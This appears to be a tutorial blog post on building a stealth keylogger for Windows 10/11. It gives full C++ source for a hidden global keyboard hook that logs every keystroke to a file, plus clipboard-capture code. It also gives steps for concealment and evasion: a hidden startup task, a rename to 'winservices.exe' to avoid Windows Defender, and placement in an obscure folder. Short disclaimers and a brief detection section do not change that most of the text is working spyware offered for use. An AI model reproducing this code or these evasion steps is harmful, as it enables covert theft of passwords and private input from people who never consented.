Building a Stealth Keylogger on Windows 10/11: A Deep Dive

⚠️ Disclaimer

This guide is for educational and research purposes only. Using a keylogger on someone else’s system without their explicit permission is illegal and unethical. This tutorial is meant for ethical hacking, cybersecurity research, and penetration testing.

📌 What is a Keylogger?

A keylogger is a program that records keystrokes on a system. It is often used for:

✅ Ethical hacking (testing security measures).

✅ Parental monitoring (with consent).

✅ Cybersecurity training (understanding attacker techniques).

❌ Malicious activities (hacking, identity theft) – Illegal!

Modern keyloggers must bypass Windows security features such as:

Windows Defender – Built-in antivirus protection.
UAC (User Account Control) – Prevents unauthorized modifications.
Process Monitoring – Detects unauthorized background processes.

This guide covers bypassing these protections while ensuring stealth.

🛠️ Step 1: Setting Up Your Development Environment

1️⃣ Install Visual Studio 2022

We’ll use C++ with Windows API, requiring a powerful IDE.

Download & install Visual Studio 2022.
Choose C++ Desktop Development during installation.

2️⃣ Install Windows SDK

Enable Windows 10 SDK to access system functions during installation.

3️⃣ Create a New C++ Project

Open Visual Studio.
Click File → New → Project.
Select Console Application.
Click Create.

⌨️ Step 2: Writing the Keylogger Code

Create a new file keylogger.cpp and copy the following modern keylogger code:

#include <windows.h>
#include <fstream>
#include <string>

HHOOK g_hook;  // Global hook
std::ofstream g_logFile;

// Function to log keystrokes
void LogKeystroke(int key) {
    char keyChar = MapVirtualKeyA(key, MAPVK_VK_TO_CHAR);
    
    if (keyChar >= 32 && keyChar <= 126) {
        g_logFile << keyChar;  // Log printable characters
    } else {
        switch (key) {
            case VK_RETURN: g_logFile << "[ENTER]"; break;
            case VK_BACK: g_logFile << "[BACKSPACE]"; break;
            case VK_SPACE: g_logFile << " "; break;
            case VK_TAB: g_logFile << "[TAB]"; break;
            case VK_ESCAPE: g_logFile << "[ESC]"; break;
            default: g_logFile << "[SPECIAL_KEY]"; break;
        }
    }
    g_logFile.flush();
}

// Hook procedure
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode == HC_ACTION) {
        KBDLLHOOKSTRUCT* pKeyInfo = (KBDLLHOOKSTRUCT*)lParam;
        if (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) {
            LogKeystroke(pKeyInfo->vkCode);
        }
    }
    return CallNextHookEx(g_hook, nCode, wParam, lParam);
}

// Main function
int main() {
    ShowWindow(GetConsoleWindow(), SW_HIDE); // Hide console
    
    g_logFile.open("C:\\Windows\\Temp\\system_logs.txt", std::ios::app);
    if (!g_logFile.is_open()) {
        return 1;
    }

    g_hook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, GetModuleHandle(NULL), 0);
    if (!g_hook) {
        return 1;
    }

    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    UnhookWindowsHookEx(g_hook);
    g_logFile.close();
    return 0;
}

🛠️ Step 3: Compiling & Running the Keylogger

1️⃣ Build the Executable

In Visual Studio, select Release Mode.
Click Build → Build Solution (Ctrl + Shift + B).

2️⃣ Run the Keylogger

Navigate to the compiled .exe file.
Run it – the console will disappear, and logging begins.
The key logs are saved in:

C:\Windows\Temp\system_logs.txt

(Why? The Temp folder is less monitored than System32.)

🕵️ Step 4: Hiding the Keylogger for Stealth

To avoid detection:

Run in the background.
Disguise file name.
Avoid common logging locations.

1️⃣ Converting to a Background Process

Open Task Scheduler (taskschd.msc).
Create a new task:
Trigger: System startup.
Action: Start a program (keylogger.exe).
Hidden: Yes.

2️⃣ Disabling Windows Defender Detection

Rename the executable to something common:

winservices.exe

Store it in an uncommon location:

C:\Users\Public\Libraries

📖 Step 5: Advanced Keylogging (Beyond Basics)

🔹 Adding Clipboard Logging

#include <windows.h>

std::string GetClipboardText() {
    if (!OpenClipboard(nullptr)) return "";
    HANDLE hData = GetClipboardData(CF_TEXT);
    if (!hData) return "";
    char* pszText = static_cast<char*>(GlobalLock(hData));
    if (!pszText) return "";
    std::string text(pszText);
    GlobalUnlock(hData);
    CloseClipboard();
    return text;
}

(Logs copy-pasted data.)

🛡️ Defending Against Keyloggers

🔍 How to Detect & Remove Keyloggers

Task Manager (Ctrl + Shift + Esc) → Check unknown processes.
Monitor Startup Programs (msconfig) → Remove suspicious entries.
Use Windows Defender → Full scan for keylogger files.
Enable On-Screen Keyboard → Prevent physical keystroke logging.

⚠️ Ethical & Legal Considerations

✅ Allowed Use Cases:

Ethical hacking (with permission).
Penetration testing in a lab environment.
Personal security research.

❌ Illegal Use Cases:

Spying on others.
Stealing credentials.
Unauthorized access.

Always get explicit permission before testing keyloggers on any system.

🚀 Summary & Next Steps

✔️ We built a stealth keylogger that:

✅ Records keystrokes globally.

✅ Logs keystrokes to a hidden file.

✅ Avoids detection by running in the background.

📌 What’s Next?

Learn keylogger detection techniques.
Explore malware analysis and reverse engineering.
Build anti-keylogger security tools.